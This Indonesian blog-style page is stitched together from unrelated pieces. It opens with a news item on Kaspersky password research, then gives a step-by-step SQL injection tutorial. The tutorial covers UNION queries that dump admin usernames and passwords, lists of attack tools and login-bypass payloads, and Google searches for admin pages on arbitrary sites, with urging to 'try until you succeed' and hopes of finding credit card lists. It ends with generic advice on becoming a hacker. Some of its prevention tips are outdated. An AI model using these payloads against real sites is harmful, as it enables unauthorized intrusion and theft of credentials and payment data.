Tiga Kesalahan Umum Pengguna Internet Saat Membuat Password
Ilustrasi password. [Shutterstock]
Tingginya tingkat kejahatan siber belum membuat pengguna internet mewaspadai password mereka.
Suara.com - Pengguna internet di seluruh dunia masih
belum memahami bagaimana menggunakan passwords secara efektif guna
melindungi diri mereka sendiri pada saat online. Penelitian dari Kaspersky Lab menunjukkan bahwa banyak pengguna yang menempatkan keamanan online mereka pada posisi berisiko, membuat password yang buruk serta kesalahan memiliki password ‘sederhana’ yang menimbulkan konsekuensi lebih buruk.
Melalui penelitian ini, Kaspersky Lab menemukan tiga kesalahan umum
dari password yang menyebabkan keamanan sejumlah besar pengguna internet
berisiko.
1. Pengguna menggunakan password yang sama untuk beberapa akun, ini
berarti jika password tersebut bocor, maka akun lainnya dapat diretas.
2. Pengguna menggunakan password yang lemah sehingga mudah untuk diretas.
3. Pengguna menyimpan password mereka secara tidak aman.
"Mengingat begitu banyaknya informasi pribadi dan sensitif yang kita
simpan secara online saat ini, maka pengguna harus mengambil langkah
keamanan lebih baik lagi, berupa proteksi password yang efektif, untuk
melindungi diri mereka," ucap Head of Consumer Business Kaspersky Lab,
Andrei Mochola dalam keterangan resminya, Rabu (18/1/2017).
Dia menambahkan, sayangnya banyak pengguna yang tidak menyadari bahwa
mereka selalu jatuh ke dalam perangkap pembuatan manajemen password
‘sederhana’ yang salah. Sehingga berakibat pada data-data pribadi
e-mail, rekening bank dan lainnya, bagi penjahat siber.
Penelitian menunjukkan sejumlah besar pengguna (hampir satu dari lima
– 18%) menghadapi upaya peretasan akun, tetapi hanya sedikit yang
menerapkan keamanan berupa password yang efektif dan cyber-savvy.
Pengguna bahkan tidak menciptakan password yang cukup kuat sehingga
dapat melindungi mereka dari peretasan dan pemerasan. Hanya setengah
(47%) menggunakan kombinasi huruf besar dan huruf kecil di password
mereka dan hanya dua dari tiga (64%) menggunakan campuran huruf dan
angka.
Ini terlepas dari fakta bahwa pengguna menyadari betul bahwa
perbankan online (51%), e-mail (39%) dan akun belanja online (37%)
mereka memang membutuhkan password yang kuat.
"Password terbaik tidak bisa ditemukan dalam kamus. Mereka panjang,
dengan huruf besar dan huruf kecil, angka dan tanda baca. Namun, dengan
banyaknya akun online yang dimiliki oleh pengguna saat ini, maka
bukanlah persoalan yang mudah untuk mengingat password yang aman untuk
seluruh akun,"
Injeksi SQL atau SQL Injection memiliki makna dan arti yaitu
sebuah teknik yang menyalahgunakan sebuah celah keamanan yang terjadi
dalam lapisan basis data sebuah aplikasi. Celah ini terjadi ketika
masukan pengguna tidak disaring secara benar dari karakter-karakter
pelolos bentukan string yang diimbuhkan dalam pernyataan SQL atau
masukan pengguna tidak bertipe kuat dan karenanya dijalankan tidak
sesuai harapan. Ini sebenarnya adalah sebuah contoh dari sebuah kategori
celah keamanan yang lebih umum yang dapat terjadi setiap kali sebuah
bahasa pemrograman atau skrip diimbuhkan di dalam bahasa yang lain.
(Wikipedia)
SQL injection adalah jenis aksi hacking pada keamanan komputer di
mana seorang penyerang bisa mendapatkan akses ke basis data di dalam
sistem. SQL injection yaitu serangan yang mirip dengan serangan XSS
dalam bahwa penyerang memanfaatkan aplikasi vektor dan juga dengan
Common dalam serangan XSS.
SQL injection exploits dan sejenisnya adalah hasil interfacing sebuah
bahasa lewat informasi melalui bahasa lain . Dalam hal SQL injection,
sebuah bahasa pemrograman seperti PHP atau Perl mengakses database
melalui SQL query. Jika data yang diterima dari pengguna akhir yang
dikirim langsung ke database dan tidak disaring dengan benar, maka yang
penyerang dapat menyisipkan perintah SQL nya sebagai bagian dari input.
(de-kill.blogspot)
Untuk mempermudah dalam praktek SQL Injection ini, maka bisa menggunakan tools berikut: 1. BSQL Hacker
Dikembangkan oleh Portcullis Labs, BSQL Hacker adalah SQL injection
yang di rancang untuk mengeksplor hampir seluruh jenis data base
[DOWNLOAD BSQL HACKER]
2. The Mole
Mole adalah tool open source, Mole dapat melewati beberapa sistem IPS /
IDS yang menggunakan filter generik, mole dapat meng eksplor hanya
dengan menggunak URL yang rentan dan string valid.
[DOWNLOAD THE MOLE]
3. Pangolin
Diproduksi oleh perusahaan yang sama yang membuat JSky, NOSEC,
Pangolin adalah tool injeksi SQL secara menyeluruh pada web dengan
user-friendly GUI dan support hampir untuk selur data base.
[DOWNLOAD PANGOLIN]
4. SQLMap
SQLMap adalah tool open source yang di jalankan menggunakan command dan support untuk data base MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB.
[DOWNLOAD SQLMAP]
5. Havij
Tool ini sudah sangat terkenal di gunakan oleh para peretas di
seluruh dunia, Havij di kembangkan oleh programer iran dengan GUI yang
sederhana meng injek SQL menggunakan harvij kemungkinan berhasil adalah
95 persen dan masih banyak lagi kelebihan havij.
[DOWNLOAD HAVIJ]
6. Enema SQLi
Berbeda dengan kebanyakan tool-tool injek yang di buat otomatis,
enema bukanlah tool otomatis, enam tool yang di namis yang memang di
rancang untuk profesional.
[DOWNLOAD ENEMA SQLI]
7. SQL Ninja
Sql Ninja di kembangkan oleh icesurfer tool yang di rancang untuk
targen server SQL, data base fingerprint, dan semu kemampuan untuk
mengendalikan database yang rentan injek.
[DOWNLOAD SQL NINJA]
8. SQL Sus
Sql Sus merupakan tool open source antar mukanya berbasis perintah,
anda dapat mengambil data base, mendownload file dari data base server
dan masih banya lagi.
[DOWNLOAD SQL Sus]
9. Safe SQL Injector
Safe SQL Injector terkenal dengan kemudahan penggunaannya Safe3 SI
menawarkan serangkaian fitur yang memungkinkan deteksi otomatis dan
eksploitasi kelemahan SQL injection dan pengambilalihan database server.
[DOWNLOAD SAFE SQL INJECTOR]
10. SQL Poizon
SQL Poizon memanfaatkan mesin pencarian Dork untuk menjaring
situs-situs yang rentan untuk di injek. Sql Poizon memiliki browser yang
telah terintegrasi di dalamnya.
[DOWNLOAD SQL POIZON]
Manual Tutorial SQL Injection
Pengertian SQL Injection, SQL Injection adalah sebuah aksi hacking
yang dilakukan diaplikasi client dengan cara memodifikasi perintah SQL
yang ada dimemori aplikasi client dan juga merupakan teknik
mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk
penyimpanan data.
Yang perlu diketahui sebelum melakukan SQL Injection pada MySQL:
karakter: ‘ atau –
comments: /* atau —
information_schema untuk versi: MySQL versi 5.x , tidak support untuk MySQL versi 4.x [ Langkah 1 ]
Carilah target
Misal: [site]/berita.php?id=100Tambahkan karakter ‘ pada akhir url atau
menambahkan karakter “-” untuk melihat apakah ada pesan error.
contoh:
[site]/berita.php?id=100’ atau
[site]/berita.php?id=-100
Sehingga muncul pesan error seperti berikut [ masih banyak lagi ]
[ Langkah 2 ]
Mencari dan menghitung jumlah table yang ada dalam databasenya…
gunakan perintah: order byContoh:[site]/berita.php?id=-100+order+by+1– atau
[site]/berita.php?id=-100+order+by+1/*Ceklah secara Langkah by Langkah (satupersatu)…
Misal:[site]/berita.php?id=-100+order+by+1–
[site]/berita.php?id=-100+order+by+2–
[site]/berita.php?id=-100+order+by+3–
[site]/berita.php?id=-100+order+by+4–Sehingga muncul error atau hilang pesan error…
Misal: [site]/berita.php?id=-100+order+by+9–
Berarti yang kita ambil adalah sampai angka 8
Menjadi [site]/berita.php?id=-100+order+by+8–
[ Langkah 3 ]
untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8–ok seumpama
yg keluar angka 5gunakan perintah version() atau @@version untuk
mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar
tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8– atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8–Lihat
versi yang digunakan se’umpama versi 4 tinggalkan saja karena dalam
versi 4 ini kita harus menebak sendiri table dan column yang ada pada
web tersebut karena tidak bisa menggunakan perintah
From+Information_schema..Untuk versi 5 berarti anda beruntung tak perlu
menebak table dan column seperti versi 4 karena di versi 5 ini bisa
menggunakan perintah From+Information_schema..
[ Langkah 4 ]
Untuk menampilkan table yang ada pada web tersebut adalah
perintah table_name >>> dimasukan pada angka yangg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan
setelah angka
terakhirCode:[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables–Se’umpama
table yang muncul adalah “admin”
[ Langkah 5 ]
untuk menampilkan semua isi dari table tersebut adalah
perintah group_concat(table_name) >>> dimasukan pada angka yang keluar tadi
perintah +from+information_schema.tables+where+table_schema=database()
>>> dimasukan setelah angka
terakhir[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.
tables+where+table_schema=database()–
[ Langkah 6 ]
Perintah group_concat(column_name) >>> dimasukan pada angka yang keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa–
>>> dimasukan setelah angka
terakhir[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema
.columns+where+table_name=0xhexa–Pada tahap ini kamu wajib mengextrak
kata pada isi table menjadi hexadecimal yaitu dengan cara
mengkonversinya
Website yg digunakan untuk konversi :http://www.v3n0m.net/ascii.htmContoh
kata yang ingin dikonversi yaitu admin maka akan menjadi
61646D696E[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema
.columns+where+table_name=0x61646D696E–
[ Langkah 7 ]
Memunculkan apa yang tadi telah dikeluarkan dari table yaitu dengan
caraperintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan)
>>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka
terakhirContoh
:[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi
column),6,7,8+from+(nama table berasal)–Contoh kata yang keluar adalah
id,username,passwordContoh :
[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin–
[ Langkah 8 ]
Tahap terakhir mencari halaman admin atau login.
Source HN Forum SQL Injection adalah
salah satu teknik yang sering di gunakan untuk menyerang sebuah situs
web. dengan cara ini memungkinkan seseorang dapat login tanpa harus
memiliki akun di sebuah web site Selain itu SQL injection juga
memungkinkan seseorang merubah, menghapus, maupun menambahkan data–data
yang berada didalam database bahkan pula dapat mematikannya.
Contoh Sintaks SQL Injection Contoh sintak SQL dalam PHP
1) $SQL = “select * from login where username =’$username’ and password = ‘$password’”; , {dari GET atau POST variable }
2) isikan password dengan string ’ or ’’ = ’
3) hasilnya maka SQL akan seperti ini = “select * from login where username = ’$username’ and password=’pass’ or ‘=′”; , { dengan SQL ini hasil selection akan selalu TRUE }
4) maka kita bisa inject sintax SQL (dalam hal ini OR) kedalam SQL Contoh sintaks SQL Injection
1) Sintaks SQL string ‘– setelah nama username Penanganan SQL Injection
1) Merubah script php 2) Menggunakan MySQL_escape_string
3) Pemfilteran karakter ‘ dengan memodifikasi php.ini 1. Merubah script php Contoh script php semula : $query = “select id,name,email,password,type,block from user ” . “where email = ‘$Email’ and password = ‘$Password'”; $hasil = mySQL_query($query, $id_mySQL); while($row = mySQL_fetch_row($hasil)) { $Id = $row[0]; $name = $row[1]; $email = $row[2]; $password = $row[3]; $type = $row[4]; $block = $row[5]; } if(strcmp($block, ‘yes’) == 0) { echo “<script>alert(‘Your account has been blocked’); document.location.href=’index.php’;</script>\n”; exit(); } else if(!empty($Id) && !empty($name) && !empty($email) && !empty($password));
Script diatas memungkinkan seseorang dapat login dengan menyisipkan
perintah SQL kedalam form login. Ketika hacker menyisipkan karakter ’ or
’’ = ’ kedalam form email dan password maka akan terbentuk query
sebagai berikut :
Maka dilakukan perubahan script menjadi : $query = “select id,name,email,password,type,block from user”. “where email = ‘$Email'”; $hasil = mySQL_query($query, $id_mySQL); while($row = mySQL_fetch_row($hasil)) { $Id = $row[0]; $name = $row[1]; $email = $row[2]; $password = $row[3]; $type = $row[4]; $block = $row[5]; } if(strcmp($block, ‘yes’) == 0) { echo “<script>alert(‘Your account has been blocked’); document.location.href=’index.php’;</script>\n”; exit(); } $pass = md5($Password); else if((strcmp($Email,$email) == 0) && strcmp($pass,$password) == 0));
2. Menggunakan MySQL_escape_string
Merubah string yang mengandung karakter ‘ menjadi \’ misal SQL injec’tion menjadi SQL injec\’tion
Contoh : $kar = “SQL injec’tion”;
$filter = mySQL_escape_string($kar);
echo”Hasil filter : $filter”;
Hasilnya : 3. Pemfilteran karakter ‘ dengan memodifikasi php.ini
Modifikasi dilakukan dengan mengenablekan variabel magic_quotes pada php.ini sehingga menyebabkan string maupun karakter ‘ diubah menjadi \’ secara otomatis oleh php
Contoh :
Contoh script yang membatasi karakter yang bisa masukkan : function validatepassword( input )
good_password_chars =
“abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ” validatepassword = true
for i = 1 to len( input ) c = mid( input, i, 1 )
if ( InStr( good_password_chars, c ) = 0 ) then
validatepassword = false
exit function
end if
next
end function Implementasi SQL Injection
1) Masuk ke google atau browse yg lain
2) Masukkan salah satu keyword berikut
“/admin.asp”
“/login.asp”
“/logon.asp”
“/adminlogin.asp”
“/adminlogon.asp”
“/admin_login.asp”
“/admin_logon.asp”
“/admin/admin.asp”
“/admin/login.asp”
“/admin/logon.asp”
{anda bisa menambahi sendiri sesuai keinginan anda}
3) Bukalah salah satu link yang ditemukan oleh google, kemungkinan
Anda akan menjumpai sebuah halaman login (user name danpassword).
4) Masukkan kode berikut :
User name : or a’=’a
Password : or a’=’a (termasuk tanda petiknya)
5) Jika berhasil, kemungkinan Anda akan masuk ke admin panel, di mana
Anda bisa menambahkan berita, mengedit user yang lain, merubah about,
dan lain-lain. Jika beruntung Anda bisa mendapatkan daftar kredit card yang banyak.
6) Jika tidak berhasil, cobalah mencari link yang lain yang ditemukan oleh google.
7) Banyak variasi kode yang mungkin, antara lain :
User name : admin
Password : or a’=’a
atau bisa dimasukkan ke dua–duanya misal : ‘ or 0=0 — ; “ or 0=0 — ; or 0=0 — ; ‘ or 0=0 # ; “ or 0=0 # ; ‘ or’x’=’x ; “ or “x”=”x ; ‘) or (‘x’=’x
8) Cobalah sampai berhasil hingga anda bisa masuk ke admin panel Cara pencegahan SQL INJECTION
1) Batasi panjang input box (jika memungkinkan), dengan
cara membatasinya di kode program, jadi si cracker pemula akan bingung
sejenak melihat input box nya gak bisa diinject dengan perintah yang
panjang.
2) Filter input yang dimasukkan oleh user, terutama penggunaan tanda kutip tunggal (Input Validation).
3) Matikan atau sembunyikan pesan-pesan error yang keluar dari SQL Server yang berjalan.
4) Matikan fasilitas-fasilitas standar seperti Stored Procedures, Extended Stored Procedures jika memungkinkan.
5) Ubah “Startup and run SQL Server” menggunakan low privilege user di SQL Server Security tab.
Sebelum belajar menjadi seorang hacker adalah memahami kinerja softwear terutama adalah bidang internet URL click disini URL tahap selanjutnya adalah Syntak dan banyak sekali klick disini hacker jombang kids
Masih berkaitan erat dengan postingan saya sebelum-sebelumnya, tentang Artikel : “Apa itu Hacker?”, “5Cewek
Cantik Hacker & Hacker Terkenal di Dunia” , “Fakta Menarik Tentang
Hacker” , “Langkah Apa Saja Yang Dilakukan Para Hacker Ketika Membobol
Bank.” Hacker atau Peretas biasanya
identik dengan dunia kejahatan jika memang tidak dimanfaatkan dengan
baik. Mereka lebih banyak diam dengan menyembunyikan identitasnya, tapi
dibalik itu mereka adalah Seorang Profesional yang tak ingin diketahui
oleh orang lain. Di mana Hacker
adalah mereka yang mempunyai kemampuan menganalisa kelemahan suatu
sistem atau situs, mereka punya etika serta kreatif dalam merancang
suatu program yang berguna bagi siapa saja. Sedangkan Cracker
adalah mereka yang mampu membuat suatu program bagi kepentingan dirinya
sendiri dan bersifat destruktif atau merusak dan menjadikannya suatu
keuntungan bagi dirinya atau kelompoknya. Hacker sejati bukanlah tipe
orang yang mudah menyerah kalah. Mereka memiliki daya juang yang tinggi,
dan jarang diantaranya yang bertipe suka pamer kemampuan.
Apa yang ada dalam tulisan ini adalah hasil rangkuman dari tulisan salah satu hacker yang ada dalam daftar 6 hacker top sedunia, yaitu Eric S Raymond.
Berpikirlah Seperti Seorang Hacker
Bagaimana seorang hacker berpikir? Apa yang ada di otak seorang hacker? Seorang hacker
selalu memikirkan bagaimana caranya menyelesaikan suatu masalah dan
bagaimana caranya membuat sesuatu. Seorang hacker juga sangat menghargai
kebebasan dan mau menolong dengan sukarela. Kalau ingin menjadi hacker, seseorang harus memiliki attitude ini.
Dunia ini
dipenuhi berbagai permasalahan yang sangat menarik untuk diselesaikan.
Dengan mencoba menyelesaikan permasalahan-permasalahan ini, seseorang
akan mempertajam kemampuan dan melatih kecerdasannya. Ingat juga bahwa
suatu permasalahan tidak perlu diselesaikan lebih dari sekali. Oleh
karena itu jangan pernah merasa enggan untuk membagikan informasi dan
solusi terhadap suatu permasalahan. Ini adalah tanggung jawab moral
seorang hacker.
Budaya hacker adalah suatu budaya tentang pengakuan. Seseorang tidak dapat menyebut dirinya sendiri sebagai hacker. Seseorang tidak akan pernah benar-benar menjadi hacker sampai orang lain (para hacker) menyebutnya sebagai hacker.
Untuk mendapatkan pengakuan ini tentu saja butuh usaha, kerja keras,
dan kontribusi kepada komunitas. Beberapa hal yang dapat dilakukan untuk
berkontribusi kepada komunitas:
Buatlah perangkat lunak (program) open source.
Investasikan waktu luang untuk membantu memperbaiki perangkat lunak open source dengan melakukan debugging.
Publikasikan informasi yang berguna.
Berikan bantuan untuk menjaga infratstruktur tetap berjalan.
Pelajari Pemrograman
Pelajarilah bagaimana caranya menulis program. Untuk benar-benar menjadi seorang hacker kemampuan pemrograman sangatlah penting. Para hacker
menyelesaikan berbagai permasalahan yang mereka temui dengan menulis
program. Cara paling mudah untuk mempelajari cara menulis program adalah
dengan membaca dokumentasi yang ditulis oleh para masternya. Kemudian
cobalah menulis program sedikit demi sedikit. Teruslah berlatih untuk
mencapai suatu level kemampuan pemrograman yang cukup baik. Jika sudah
cukup percaya diri dengan suatu bahasa pemrograman, cobalah untuk
mempelajari bahasa pemrograman lainnya. Mempelajari beberapa bahasa pemrograman akan mengajarkan kita memandang suatu permasalahan dari sisi lain.
Kenali dan Gunakan Unix/Linux
UNIX dan sistem operasi yang mengadopsi konsep yang sama seperti Linux dan BSD adalah sistem operasi utama Internet. Namun untuk menggunakan UNIX
seseorang mungkin harus mengeluarkan uang dalam jumlah yang cukup
besar. Solusinya adalah menggunakan sistem operasi yang open source
seperti GNU/Linux (dengan berbagai pilihan distribusi) dan FreeBSD (dan turunan BSD lainnya). Pelajarilah Linux, gunakan distro yang mudah dan ramah untuk pemula seperti Ubuntu. Pasanglah sistem operasi ini di PC atau laptop dan gunakan untuk bekerja/bermain sehari-hari.
Mungkin sebagian orang akan berpikir mengapa harus menggunakan Unix/Linux/FreeBSD? Apakah tidak bisa menggunakan sistem operasi lain? Sistem operasi tertutup seperti Microsoft Windows dan Mac OS tidak akan mengizinkan seseorang untuk mempelajari kode sumbernya apalagi melakukan modifikasi. Belajar menjadi hacker menggunakan sistem operasi seperti itu ibarat belajar menari dengan tubuh dicor.
Pelajari HTML
HTML adalah mainan hacker yang telah mengubah dunia. Belajarlah bagaimana cara menggunakan World Wide Web dan menulis kode HTML. Menggunakan Word Wide Web bukan berarti sekedar menggunakan browser dan berselancar di dunia maya melainkan bagaimana caranya membangun suatu situs menggunakan bahasa penanda web (web markup language). Cobalah membangun home page menggunakan sintaks-sintaks HTML.
Bagaimana Cara Menjadi Hacker. Caranya adalah sebagai berikut :
Persiapkan Jiwa
Persiapan jiwa ini adalah hal yang paling utama dalam menjadi seorang hacker, adapun hal yang perlu dipersiapkan adalah:
Mental dan psikologi:
hal ini dibutuhkan karena seorang hacker akan mendapatkan banyak cobaan
yang sering kali membuat down dan kadang membuat lupa diri. Seperti
caci maki, hinaan, sanjungan dan perkataan manis.
Kesabaran, ketabahan dan keikhlasan:
hal ini merupakan kunci kesuksesan seorang hacker dimana dengan hal ini
akan membuat seorang hacker tidak akan pernah menyesali setiap tindakan
yang diperbuat.
Semangat, usaha, kemauan, pantang menyerah dan kerja keras:
hal ini dibutuhkan seorang hacker untuk berjuang menggapai yang terbaik
didalam kehidupan yang dijalani, karena menjadi seorang hacker tidak
mudah dan butuh waktu yang cukup untuk memahami setiap seluk beluk ilmu
pengetahuan.
Percaya dan berserah diri hanya kepada Tuhan Yang Maha Esa: hal ini menjadi pondasi paling penting dan salah satu motto yang digunakan oleh BinusHacker Family yaitu “Tuhan Hanya Engkau Yang Esa” dimana dengan hal ini semua akan dikembalikan kepada Sang Pencipta dan menyatakan bahwa Ilmu Pengetahuan itu Tanpa Batas.
Persiapkan Raga
Persiapan
raga merupakan langkah kedua yang perlu dilakukan oleh seorang hacker,
dimana raga harus dibangun sedemikian rupa agar bisa mencapai target
yang diingikan. Hal yang perlu dipersiapkan adalah:
Kesehatan dan kebugaran:
hal ini diperlukan agar seorang hacker tetap fit dalam menghadapi
setiap tantangan dan perjuangan dalam mempelajari dan mencapai target
yang sudah ditetapkan serta kemampuan memory, daya pikir otak, nurani,
panca indra bisa dimaksimalkan.
Aktif Olahraga:
hal ini diperlukan untuk menunjang latihan tubuh agar terhindar dari
berbagai ancaman. Misalkan olahraga beladiri untuk melindungi diri
ketika ada ancaman, fitness agar tubuh tetap aktif dan sehat terjaga.
Persiapkan Perbuatan
Persiapan
perbuatan adalah langkah ketiga untuk menjadi seorang hacker, dimana
langkah yang perlu dijalani adalah langkah positif dalam kehidupan,
senantiasa beramal dan beribadah. Mengurangi, menghindari dan
meninggalkan hal-hal negatif adalah perjuangan panjang dan paling berat
untuk seorang hacker.
Belajar, Berbagi, Senantiasa Update dan Meningkatkan Kemampuan:
hal ini menjadi pondasi paling penting dan salah satu motto yang
digunakan oleh BinusHacker Family untuk bersama-sama meningkatkan
kualitas dan kuantitas kemampuan yang dimiliki.
Saling Tolong Menolong, Persahabatan, Hindarkan SARA:
hal ini diperlukan agar seorang hacker bisa berkontribusi dalam
kehidupan yang global dimana semua sangat universal. Dengan menjadi
seorang hacker maka diharuskan memiliki pandangan yang luas sehingga
bisa bertindak dengan netral, baik, adil dan bijaksana.
Ada 5 hal penting yang perlu dipelajari oleh seorang Hacker :
Logika (Logic)
Seorang
hacker harus senantiasa menggunakan logika dimana hal ini menjadi sebuah
pertimbangan akal untuk menghasilkan sesuatu yang baik, benar dan
tepat. Manusia diberikan kelebihan oleh YME untuk hal ini, maka
manfaatkan secara maksimal.
Logika yang sering digunakan dalam bahasa pemrograman adalah OR, AND, NOT, XOR, NAND, dll. Beberapa program tersusun atas komponen program IF..THEN…ELSE, FOR..TO..DO, WHILE , CASE..OF dan lain-lainnya. Logika ini kemudian akan dikolaborasikan dengan matematika untuk menghasilkan sesuatu yang bernilai Benar (True) atau Salah (False) seperti (<, >, =, +, -, dll).
Perangkat Keras (Hardware)
Seorang
hacker harus mengetahui seluk beluk perangkat keras, karena perangkat
keras merupakan dasar dari pembentukan teknologi. Perangkat keras disini
adalah mengerti seluk beluk pengkabelan, chip, mainboard, switch, hub, elektronika, dll.
Apabila seorang hacker sudah memahami perangkat keras, maka akan lebih
mudah dalam membuat instruksi untuk perangkat lunaknya. Pernah melihat
James Bond & Mission Impossible? Nah, diluarsana banyak orang
luarbiasa yang memahami hardware sangat dalam.
Yang perlu dipelajari lebih dalam dari perangkat kerasa adalah komponen pada bagian-bagian berikut:
Input Device (Unit Masukan: Keyboard, Mouse): media untuk memasukkan data dari luar ke dalam suatu memori dan processor.
Process Device (Unit Pemrosesan: CPU, Microchip,RAM): media untuk mengolah inputan guna menghasilkan informasi yang diperlukan.
Output Device (Unit Keluaran: Monitor, Scanner, Speaker): media untuk mengeluarkan hasil informasi.
Backing Storage ( Unit Penyimpanan: Harddisk, Disk): media untuk melakukan penyimpanan data dan informasi.
Periferal ( Unit Tambahan: USB, Modem): media tambahan yang digunakan untuk mendukung proses kerja perangkat keras.
Perangkat Lunak (Software)
Seorang
hacker akan mempelajari software sebagai instruksi kepada hardware untuk
melakukan perintah-perintah yang diinginkan. Software ini dibangun dari
berbagai bahasa, dimana bahasa yang perlu dipelajari dalam bahasa mesin
adalah 0, 1 dan analog. Sebagai dasar adalah bahasa pemrograman adalah
assembly. Urutan yang tepat sebagai berikut saya kutip dari wikipedia:
Bahasa Mesin, yaitu memberikan perintah kepada komputer dengan memakai kode bahasa biner, contohnya 01100101100110.
Bahasa Tingkat Rendah (ASM) atau dikenal dengan istilah bahasa rakitan (bah.Inggris Assembly), yaitu memberikan perintah kepada komputer dengan memakai kode-kode singkat (kode mnemonic), contohnya MOV, SUB, CMP, JMP, JGE, JL, LOOP, dsb.
Bahasa Tingkat Menengah
(C), yaitu bahasa komputer yang memakai campuran instruksi dalam
kata-kata bahasa manusia (lihat contoh Bahasa Tingkat Tinggi di bawah)
dan instruksi yang bersifat simbolik, contohnya {, }, ?, <<,
>>, &&, ||, dsb.
Bahasa Tingkat Tinggi
(HTML, XML, JSP, JAVA, VB, PASCAL, DELPHI, C#, F#, PHP, ASP, SQL,
ORACLE, PYTHON, PERL, dll) yaitu bahasa komputer yang memakai instruksi
berasal dari unsur kata-kata bahasa manusia, contohnya begin, end, if,
for, while, and, or, dsb.
Sebagai seorang hacker,
semakin kompleks mengetahui bahasa pemrograman maka akan semakin mudah
dalam memolak balikkan software, mencari celah, memperbaiki, memberikan
solusi untuk memecahkan masalah dan bahkan membangun sebuah aplikasi
baru.
Kuncinya adalah semakin dalam mengetahui bahasa mesin, akan lebih mudah dalam berkomunikasi dengan mesin.
Selain
mengenal bahasa pemrograman, yang perlu dipelajari adalah sistem yang
dibangun dari software yang sudah ada saat ini, sebagai salah satu
contoh yaitu Sistem Operasi: *Nix, Linux, FreeBSD, SunOS, Windows, dll.
Jaringan (Networking)
Seorang
hacker perlu mengetahui dan mendalami jaringan elektronik dan komputer
yang merupakan bagian penting untuk dipelajari, karena jaringan inilah
yang menghubungkan antara satu dengan yang lainnya seperti sebuah jaring
laba-laba yang tidak terputus.
Ketika kita
sudah memahami jaringan maka akan cukup mudah dalam melakukan setting,
konfigurasi dan dapat memegang kendali terhadap jaringan. Didalam
jaringan inilah alur komunikasi bergerak antara satu perangkat ke
perangkat yang lainnya. Pada jaringan inilah banyak protokol komunikasi
yang digunakan sehingga perlu juga untuk dipelajari seperti TCP, HTTP/S, FTP/S,
dll. Apabila jaringan berada didalam kendali, maka seluruh informasi
yang mengalir didalamnya akan sangat mudah untuk didapat, ditambah,
diubah, bahkan untuk dihapus sekalipun.
Kriptografi (Cryptography)
Seorang hacker memiliki tantangan dalam hal kriptografi, karena saat ini hampir seluruh transaksi komunikasi sudah menggunakan cryptography sebagai jembatan pelindung.
Dengan modal logika yang matang maka cryptography dapat lebih mudah
untuk dipelajari walaupun dalam struktur yang sulit. Seorang hacker
memerlukan pengetahuan kriptografi untuk menjaga aspek keamanan
informasi seperti kerahasiaan informasi, keabsahan informasi, integritas
informasi, serta autentikasi informasi dan bahkan untuk mendapatkan dan
menerjemahkan informasi itu sendiri.
Ada banyak model kriptografi yang saat ini sudah banyak berkembang yaitu MD5, SHA, DES, AES, Base64, IDEA, BLOWFISH, RSA, Dll. Kriptografi ini banyak digunakan untuk konfigurasi, penyimpanan data dalam database, dan komunikasi transaksi pada jaringan.
Yang paling penting dilakukan jika ingin menjadi seorang hacker sejati :
Niat baik, berdoa, beretika, tekad yang kuat, selalu optimis dan ketekunan yang tak pernah berakhir.
Banyak bertanya dan terus menyimak, terutama kepada ahlinya, kemudian ambil hikmah untuk dipelajari dan dikerjakan.
Banyak begadang untuk belajar, mengoprek alat elektronik, komputer dan hal-hal mengasyikkan lainnya.
Cari referensi ilmu pengetahuan sebanyak-banyaknya baik dari buku, jurnal, ebook, dll.
Lakukan dengan sengaja merusak gadget dimulai dari dengan yang sederhana, kemudian memulai untuk memperbaiki gadget tersebut.
Belajar teknik sosial engineering untuk
mengetahui dan memanfaatkan manusia, belajar reverse engineering untuk
mengetahui dan memanfaatkan komputer.
Memiliki modal, kemauan yang kuat, berani gagal dan berani bertindak untuk melakukan penelitian.
Jangan pernah malas untuk membaca artikel teknologi, berjalan-jalan mengelilingi blog (blogwalking), belajar jangan terpaku pada salah satu forum saja.
Berani melakukan instalasi beberapa OS
pada komputer pribadi, misal Linux, Windows, VWWare, FreeBSD, dll.
Kemudian belajar bahasa pemrograman dan scripting yang non-formal (Perl,
Python, Ruby, dll).
Persiapkan peralatan pribadi, dan peralatan lainnya yang didapat dari sumber lain untuk memulai proses hacking.
Rajin berdoa kepada Tuhan YME dan berimajinasi yang penuh dengan ilusi agar mendapatkan inspirasi.
KISS: Keep IT Simple Stupid, menjadikan IT sebagai sesuatu yang mudah seperti kegiatan sehari-hari.
Wajib untuk mengenali batasan dan
kemampuan diri, agar bisa mengukur apa yang perlu untuk dilakukan dan
tidak memaksakan sesuatu.
Jangan bermimpi terlalu tinggi, karena saat jatuh akan terasa parah sakitnya.
Jangan terlalu berdiam diri, tetapi tetap terus berinteraksi dengan rendah hati.
Belajar berbicara dan berinteraksi dengan komputer dengan mempelajari bahasa yang digunakan untuk instruksi komputer.
Jangan mudah menyerah saat dihina, dipermainkan, dibohongi, terus percaya diri dan selalu semangat.
Persiapkan otak yang fun, agar tidak terlalu penat, selalu ceria dan bahagia dalam beraktifitas.
Belajar IT basic merupakan hal yang
penting, daripada sekedar menggunakan software yang sudah ada saat ini
untuk kegiatan hacking.
Belajar untuk memahami concept, jangan copy paste sembarangan dan mulai dari hal yang paling kecil terlebih dahulu.
Mengerti cara kerja hardware dan software sehingga menjadi selaras sejalan, berani merubah nya bisa juga mengembalikan nya.
